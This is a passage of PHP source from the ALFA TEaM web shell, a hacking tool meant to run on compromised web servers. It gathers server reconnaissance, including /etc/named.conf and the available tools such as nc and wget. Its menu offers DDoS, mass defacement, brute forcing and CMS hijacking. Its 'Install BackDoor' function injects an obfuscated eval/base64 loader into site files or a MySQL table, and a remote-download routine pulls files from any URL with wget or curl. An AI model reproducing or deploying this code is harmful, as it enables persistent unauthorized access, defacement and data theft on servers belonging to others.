1874<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
1875<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
1876</tr>
1877<tr>
1878<td><span class="header_vars">PHP:</span></td>
1879<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
1880</tr>
1881<tr>
1882<td><span class="header_vars">ServerIP:</span></td>
1883<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
1884</tr>
1885<tr>
1886<td width="3%"><span class="header_vars">DateTime:</span></td>
1887<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
1888</tr>
1889<tr>
1890<td><span class="header_vars">Domains:</span></td>
1891<td width="76%"><span class="header_values" id="header_domains">';
1892if($GLOBALS['sys']=='unix'){
1893$d0mains = _alfa_file("/etc/named.conf",false);
1894if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
1895$count=0;
1896foreach($d0mains as $d0main){
1897if(@strstr($d0main,"zone")){
1898preg_match_all('#zone "(.*)"#', $d0main, $domains);
1899flush();
1900if(strlen(trim($domains[1][0])) > 2){
1901flush();
1902$count++;}}}
1903echo "$count Domains";}}
1904else{echo("Cant Read [ /etc/named.conf ]");}
1905echo '</span></td>
1906</tr>
1907<tr>
1908<td height="16"><span class="header_vars">HDD:</span></td>
1909<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1910</tr>';
1911if($GLOBALS['sys']=='unix'){
1912$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1913if(!@ini_get('safe_mode')){
1914if(strlen(alfaEx("id",false,false))>0){
1915echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1916$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1917$x=0;
1918foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
1919if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1920echo '</td>
1921</tr>
1922<tr>
1923<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1924$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1925$x=0;
1926foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
1927if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1928echo '</td>
1929</tr>';
1930}else{
1931echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1932}
1933}else{
1934echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1935}
1936}else{
1937echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1938echo alfaEx('ver',false,false);
1939echo '</td>
1940</tr> <tr>
1941<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
1942</tr></b>';
1943}
1944$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
1945echo '<tr>
1946<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
1947</tr>
1948<tr>
1949<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
1950</tr>
1951<tr>
1952<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
1953</tr>
1954<tr>
1955<td height="11"><span class="header_vars">SoftWare: </span></td>
1956<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1957</tr>';
1958if($GLOBALS['sys']=="win"){
1959echo '<tr>
1960<td height="12"><span class="header_vars">DRIVE:</span></td>
1961<td colspan="2"><b>'.$drives.'</b></td>
1962</tr>';
1963}
1964echo '<tr>
1965<td height="12"><span class="header_vars">PWD:</span></td>
1966<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
1967</tr>
1968</table>
1969</div>
1970<div id="meunlist">
1971<ul>
1972';
1973$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
1974'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
1975'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
1976'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
1977'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
1978);
1979foreach($li as $key=>$value){
1980echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
1981}
1982if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
1983echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
1984else
1985echo '</ul></div>';}else{
1986@error_reporting(E_ALL ^ E_NOTICE);
1987@ini_set('error_log',NULL);
1988@ini_set('log_errors',0);
1989@ini_set('max_execution_time',0);
1990@ini_set('magic_quotes_runtime', 0);
1991@set_time_limit(0);
1992}}
1993function alfalogout(){
1994unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
1995echo("<center><font color='red'>Logout...</font></center>");
1996}
1997function showAnimation($name){
1998 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
1999}
2000function __showicon($r){
2001 $s['btn']='http://solevisible.com/images/btn.png';
2002 $s['alfamini']='http://solevisible.com/images/alfamini.png';
2003 $s['loader']='http://solevisible.com/images/loader.png';
2004 //return 'data:image/png;base64,'.__get_resource($s[$r]);
2005 return $s[$r];
2006}
2007function alfainbackdoor(){
2008alfahead();
2009echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
2010$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
2011$success= '<font color="green">Success...!';
2012$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
2013$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
2014$cwd = 'Example: /home/alfa/public_html/index.php';
2015if($_POST['alfa1']=='file'){
2016echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
2017if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
2018$method = $_POST['alfa2'];
2019$file = $_POST['alfa3'];
2020$shell = $_POST['alfa4'];
2021$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
2022if($key=='')$key='alfa';
2023if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2024$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
2025if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
2026if($_POST['alfa1']=='db'){
2027echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
2028$table = array('td1' =>
2029array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2030'td2' =>
2031array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2032'td3' =>
2033array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2034'td4' =>
2035array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2036'td5' =>
2037array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
2038'td6' =>
2039array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
2040);
2041create_table($table);
2042echo("<p>{$select}</p>");
2043echo($textarea);
2044echo("<p><input type='submit' value=' '></p></form></p></center>");
2045if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
2046$dbhost = $_POST['alfa2'];
2047$dbuser = $_POST['alfa3'];
2048$dbpw = $_POST['alfa4'];
2049$dbname = $_POST['alfa5'];
2050$file = $_POST['alfa6'];
2051$method = $_POST['alfa7'];
2052$shell = $_POST['alfa8'];
2053$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
2054if($key=='')$key='alfa';
2055if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2056if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
2057$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
2058if(@is_file($file)&&@is_writable($file)){
2059@mysqli_query($conn,'DROP TABLE `alfa_bc`');
2060@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
2061@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
2062@file_put_contents($file,$code."\n".@file_get_contents($file));
2063__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
2064echo('</div>');
2065alfafooter();
2066}
2067function alfawhois(){
2068echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
2069if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
2070$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
2071$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
2072$data = @file_get_contents($target);
2073if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
2074$target = @json_decode($data,true);
2075echo __pre();
2076if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
2077echo("</div>");
2078}
2079function alfaremotedl(){
2080alfahead();
2081echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
2082<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
2083<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
2084<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
2085</form></p></center>");
2086if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
2087echo __pre();
2088$url = $_POST['alfa1'];
2089$path = $_POST['alfa2'];
2090echo('<center>');
2091if(__download($url,$path)){
2092echo('<font color="green">Success...!</font>');
2093}else{
2094echo('<font color="red">Error...!</font>');
2095}
2096echo('</center>');
2097}
2098echo("</div>");
2099alfafooter();
2100}
2101function __download($url,$path=false){
2102if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
2103$saveas = basename(rawurldecode($url));
2104if($path){$saveas=$path.$saveas;}
2105if($content = __read_file($url)){
2106if(@is_file($saveas))@unlink($saveas);
2107if(__write_file($saveas, $content)){return true;}}
2108$buff = alfaEx("wget ".$url." -O ".$saveas);
2109if(@is_file($saveas)) return true;
2110$buff = alfaEx("curl ".$url." -o ".$saveas);
2111if(@is_file($saveas)) return true;
2112$buff = alfaEx("lwp-download ".$url." ".$saveas);
2113if(@is_file($saveas)) return true;
2114$buff = alfaEx("lynx -source ".$url." > ".$saveas);
2115if(@is_file($saveas)) return true;
2116$buff = alfaEx("GET ".$url." > ".$saveas);
2117if(@is_file($saveas)) return true;
2118$buff = alfaEx("links -source ".$url." > ".$saveas);
2119if(@is_file($saveas)) return true;
2120$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
2121if(@is_file($saveas)) return true;
2122return false;
2123}
2124function clean_string($string){
2125 if(function_exists("iconv")){
2126 $s = trim($string);
2127 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
2128 }
2129 return $s;
2130}
2131function __read_file($file, $boom = true){
2132$content = false;
2133if($fh = @fopen($file, "rb")){
2134$content = "";
2135while(!feof($fh)){
2136$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
2137}
2138}
2139if(empty($content)||!$content){
2140 $content = alfaEx("cat '".addslashes($file)."'");
2141}
2142return $content;
2143}
2144function alfaSettings(){
2145alfahead();
2146AlfaNum(6,7,8,9,10);
2147echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
2148if($_POST["alfa8"] == "main"){
2149echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
2150$lg_array = array('0'=>'No','1'=>'Yes');
2151$penc_array = array('false'=>'No','true'=>'Yes');
2152$protect_html = "";
2153$icon_html = "";
2154$postEnc_html = "";
2155$login_html = "";
2156foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
2157foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
2158foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
2159$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
2160foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
2161echo '';
2162echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
2163if($_POST['alfa5']=='>>'){
2164echo __pre();
2165if(!empty($_POST['alfa3'])){
2166$protect = $_POST['alfa1'];
2167$lgpage = $_POST['alfa2'];
2168$username = $_POST['alfa3'];
2169$password = md5($_POST['alfa4']);
2170$icon = $_POST['alfa6'];
2171$post_encrypt = $_POST['alfa7'];
2172@chdir($GLOBALS['home_cwd']);
2173$basename = @basename($_SERVER['PHP_SELF']);
2174$data = @file_get_contents($basename);
2175$find_user = '/\'user\'(.*?),/i';
2176$find_pw = '/\'pass\'(.*?),/i';
2177$find_lg = '/\'login_page\'(.*?),/i';
2178$find_p = '/\'safemode\'(.*?),/i';
2179$icons = '/\'show_icons\'(.*?),/i';
2180$postEnc = '/\'post_encryption\'(.*?),/i';
2181if(!empty($username)&&preg_match($find_user,$data,$e)){
2182$new = '\'user\' => \''.$username.'\',';
2183$data = str_replace($e[0],$new,$data);
2184}
2185if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
2186$new = '\'pass\' => \''.$password.'\',';
2187$data = str_replace($e[0],$new,$data);
2188}
2189if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
2190$new = '\'login_page\' => \''.$lgpage.'\',';
2191$data = str_replace($e[0],$new,$data);
2192}
2193if(!empty($find_p)&&preg_match($find_p,$data,$e)){
2194$new = '\'safemode\' => \''.$protect.'\',';
2195$data = str_replace($e[0],$new,$data);
2196}
2197if(preg_match($icons,$data,$e)){
2198$new = '\'show_icons\' => \''.$icon.'\',';
2199$data = str_replace($e[0],$new,$data);
2200}
2201if(preg_match($postEnc,$data,$e)){
2202$new = '\'post_encryption\' => '.$post_encrypt.',';
2203$data = str_replace($e[0],$new,$data);
2204}
2205if(@file_put_contents($basename,$data)){
2206echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
2207}else{
2208__alert("<span style='color:red;'>File has no edit access...!</span>");
2209}
2210}else{
2211__alert("<span style='color:red;'>UserName is Empty !</span>");
2212}
2213}
2214}elseif($_POST["alfa8"] == "color"){
2215echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
2216echo '<table border="1"><tbody>';
2217$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
2218$x = 1;
2219foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
2220 $multi = "";
2221 if(is_array($value)){
2222 if(isset($value["multi_selector"])){
2223 $multi = __ZW5jb2Rlcg(json_encode($value));
2224 }
2225 }
2226 $value = alfa_getColor($key);
2227 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
2228 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
2229}
2230echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
2231
2232echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
2233if($_POST['alfa7']=='export'){
2234 echo __pre();
2235 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
2236 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2237 $array = array();
2238 foreach($glob_colors as $k => $v){
2239 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2240 $v = trim($colors[$k]);
2241 }else{
2242 $v = trim(is_array($v)?$v["key_color"]:$v);
2243 }
2244 $array[$k] = $v;
2245 }
2246 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
2247 $config = json_encode($array, JSON_PRETTY_PRINT);
2248 if(!@file_put_contents($file, $config)){
2249 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
2250 }else{
2251 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
2252 }
2253}
2254if($_POST['alfa2']=='>>'){
2255 echo __pre();
2256 $colors = json_decode($_POST["alfa1"],true);
2257 $array = "";
2258 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
2259 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2260 foreach($glob_colors as $k => $v){
2261 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2262 $v = trim($colors[$k]);
2263 }else{
2264 $v = trim(is_array($v)?$v["key_color"]:$v);
2265 }
2266 $array .= '"'.trim($k).'" => "'.$v.'",';
2267 }
2268 @chdir($GLOBALS['home_cwd']);
2269 $basename = @basename($_SERVER['PHP_SELF']);
2270 $data = @file_get_contents($basename);
2271 $color = '/\'color\'(.*?)\),/s';
2272 if(preg_match($color,$data,$e)){
2273 $new = "'color' => array(".$array."),";
2274 $data = str_replace($e[0],$new,$data);
2275 if(@file_put_contents($basename, $data)){
2276 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
2277 }else{
2278 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
2279 }
2280 }else{
2281 echo("<center><p><h3>[-] Error...!</h3></p></center>");
2282 }
2283}
2284}
2285echo('</div>');
2286alfafooter();
2287}
2288function alfaplus(){
2289alfahead();
2290echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
2291if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
2292try{
2293$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
2294$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
2295$news = new AlfaCURL();
2296if($news->Send($s1)){
2297$xml = $news->Send($s1);
2298}else{
2299$xml = false;
2300}
2301if($xml){
2302if(@simplexml_load_string($xml)){
2303$doc = new DOMDocument;
2304$doc->loadXML($xml);
2305$data = $doc->getElementsByTagName('data')->item(0);
2306$items = $data->getElementsByTagName('item');
2307foreach($items as $item){
2308$title = $item->getElementsByTagName('title')->item(0)->nodeValue;
2309$description = $item->getElementsByTagName('description')->item(0)->nodeValue;
2310$link = $item->getElementsByTagName('link')->item(0)->nodeValue;
2311$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
2312echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
2313}
2314}else{
2315echo($msg);
2316}
2317}else{
2318echo($msg);
2319}
2320}catch(Exception $e){
2321echo $e->getMessage();
2322}}elseif($_POST['alfa1']=='about'){
2323echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
2324<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
2325<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
2326<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
2327<font color='#00A220'>Telegram Channel: @solevisible</font><br>
2328<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
2329<font color='#FFFFFF'>Skype : sole.sad</font><br>
2330<font color='#FF0000'>Persian Gulf For Ever</font><br>
2331<font color='#FF0000'>Iranian Hackers :)</font><br>
2332<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
2333</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
2334}
2335echo('</div>');
2336alfafooter();
2337}
2338function alfaDumper(){
2339alfahead();
2340echo('<div class="header">');
2341AlfaNum(8,9,10);
2342echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
2343$table = array('td1' =>
2344 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2345 'td2' =>
2346 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2347 'td3' =>
2348 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2349 'td4' =>
2350 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2351 'td5' =>
